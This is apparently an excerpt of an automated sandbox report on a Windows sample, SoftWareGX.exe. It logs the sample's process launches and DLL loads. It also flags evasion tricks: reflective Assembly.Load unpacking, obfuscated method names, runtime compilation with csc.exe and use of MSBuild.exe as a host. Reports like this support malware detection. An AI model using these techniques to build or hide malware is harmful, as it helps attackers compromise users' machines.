                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6748 --field-trial-handle=1944,i,7961870542486980772,7260654766285692806,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Users\user\Desktop\SoftWareGX.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ndfapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wdi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: duser.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: atlthunk.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntshrui.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cscapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: linkinfo.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: pcacli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                Source: C:\Users\user\Desktop\SoftWareGX.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Google Drive.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: YouTube.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Sheets.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Gmail.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Slides.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Docs.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: SoftWareGX.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: SoftWareGX.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                Source: SoftWareGX.exeStatic file information: File size 10584064 > 1048576
                Source: SoftWareGX.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0xa0e000
                Source: SoftWareGX.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: SoftWareGX.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: MSBuildsers\user\AppData\Local\Temp\yomkssf4\yomkssf4.pdb source: SoftWareGX.exe, 00000005.00000002.1304719584.0000000002019000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: q6C:\Users\user\AppData\Local\Temp\yomkssf4\yomkssf4.pdb source: SoftWareGX.exe, 00000005.00000002.1305403965.0000000003D6B000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: q6C:\Users\user\AppData\Local\Temp\yomkssf4\yomkssf4.pdb| source: SoftWareGX.exe, 00000005.00000002.1305403965.0000000003D6B000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: q6C:\Users\user\AppData\Local\Temp\m3uz1vzd\m3uz1vzd.pdb| source: SoftWareGX.exe, 00000005.00000002.1305403965.0000000003CC1000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: q6C:\Users\user\AppData\Local\Temp\m3uz1vzd\m3uz1vzd.pdb source: SoftWareGX.exe, 00000005.00000002.1305403965.0000000003CC1000.00000004.00000800.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 5.2.SoftWareGX.exe.3cd94d0.0.raw.unpack, ManagesModules.cs.Net Code: DataModule System.Reflection.Assembly.Load(byte[])
                Source: 5.2.SoftWareGX.exe.6110000.4.raw.unpack, ManagesModules.cs.Net Code: DataModule System.Reflection.Assembly.Load(byte[])
                Source: m3uz1vzd.dll.6.dr, ManagesModules.cs.Net Code: DataModule System.Reflection.Assembly.Load(byte[])
                Source: SoftWareGX.exeStatic PE information: 0xB9EE827D [Tue Nov 6 08:25:33 2068 UTC]
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m3uz1vzd\m3uz1vzd.cmdline"
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yomkssf4\yomkssf4.cmdline"
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m3uz1vzd\m3uz1vzd.cmdline"Jump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yomkssf4\yomkssf4.cmdline"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0043BAE1 push es; ret 15_2_0043BAE3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0043CB8C push 00000046h; iretd 15_2_0043CB8F
                Source: SoftWareGX.exe, aNQaxxDiYjXg.csHigh entropy of concatenated method names: 'MsYIiHCKOVg', 'AEIcapmlYwreYrwbho', 'grtEQPnEWQeGyOSsVquAnysLp', 'pxnOSxlzAtLoJePZLWYzXO', 'IbsfQgxrfqgPuy', 'ztQvAnOyfhhCblhxUz', 'dxdlOMPOTTnPkakgWUGEGfztEkAq', 'OAifdjgfkNwmDDXqVnAD', 'TLJetgkhOgLr', 'drEVxryILBScHeTHJfUUrx'
                Source: SoftWareGX.exe, uBQRQemRwragayxWIgNspKbnCcaXv.csHigh entropy of concatenated method names: 'IjUmeHhCBOyXrjvVvfONTPF', 'jPPhvaEdyPCFnNAkJlNs', 'BeQPfkZSpjPvYqqBenLtJZo', 'CYawTJzZuySnyVztOHTAHtpzd', 'JjaSPmSzbwZLvheEztVywB', 'AQYdCEVeAxZE', 'ahfneZThAlkikgxqxo', 'YMclrJgYWZTZSKJJSQaYw', 'vJnhTmqycRrvnmNN', 'bxqWmohFigqxoF'
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\m3uz1vzd\m3uz1vzd.dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\yomkssf4\yomkssf4.dllJump to dropped file

                Boot Survival

                barindex
                Monitors registry run keys for changes
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
